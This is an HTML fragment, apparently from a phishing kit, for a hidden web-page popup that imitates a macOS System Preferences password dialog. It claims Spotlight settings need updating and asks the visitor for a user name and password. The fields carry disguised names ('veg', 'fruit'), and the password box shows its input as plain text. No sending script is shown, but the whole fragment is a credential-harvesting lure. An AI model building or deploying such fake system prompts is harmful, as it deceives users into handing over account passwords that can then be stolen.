<div id="macOsPopup" class="macos-popup-container" style="display: none">
  <div class="macos-popup">
    <div class="macos-popup-header"></div>
    <div class="macos-padlock-container">
      <img class="macos-padloack-img" src="site/public/img/macos-security-icon.png" alt="">
    </div>
    <div class="macos-text-container">
      <div class="macos-headline">
        <strong>System Preferences needs to update Spotlight settings.</strong>
      </div>
      <div class="macos-permission">
        Enter your password to allow this.
      </div>
      <div class="macos-inputs">
        <div class="macos-input-group">
          <label class="macos-label" for="veg">User Name:</label>
          <input class="macos-input" type="text" name="veg" value="admin">
        </div>

        <div class="macos-input-group">
          <label class="macos-label" for="fruit">Password:</label>
          <input class="macos-input macos-password" type="text" name="fruit">
        </div>

      </div>
      <div class="macos-buttons">
        <button id="cancel" class="macos-btn macos-cancel">Cancel</button>
        <button id="submit" class="macos-btn macos-submit">Update</button>
      </div>
    </div>
  </div>
</div>
